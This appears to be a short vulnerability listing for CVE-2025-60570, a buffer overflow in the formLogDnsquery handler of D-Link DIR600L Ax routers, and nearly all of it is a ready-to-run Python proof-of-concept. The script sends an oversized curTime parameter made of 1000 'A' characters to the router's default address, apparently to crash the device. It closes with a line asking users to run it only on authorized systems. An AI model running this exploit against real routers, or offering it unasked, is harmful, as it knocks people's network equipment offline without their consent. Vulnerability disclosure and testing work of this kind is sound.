D-Link DIR600L Ax缓冲区溢出漏洞 CVE-2025-60570

import requests # CVE-2025-60570 PoC - D-Link DIR600L Ax Buffer Overflow in formLogDnsquery # Target: D-Link DIR600L Ax router with FW116WWb01 firmware target_ip = "192.168.0.1" # Default D-Link router IP target_port = 80 # Construct malicious payload with oversized curTime parameter # This triggers buffer overflow in formLogDnsquery function buffer_size = 1000 # Adjust based on target malicious_payload = "A" * buffer_size # Construct the exploit request exploit_url = f"http://{target_ip}:{target_port}/formLogDnsquery" params = { "curTime": malicious_payload } print(f"[*] Sending exploit payload to {exploit_url}") print(f"[*] Payload size: {len(malicious_payload)} bytes") try: response = requests.get(exploit_url, params=params, timeout=10) print(f"[+] Request sent. Status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] Note: This PoC may cause DoS. Use responsibly and only on authorized systems.")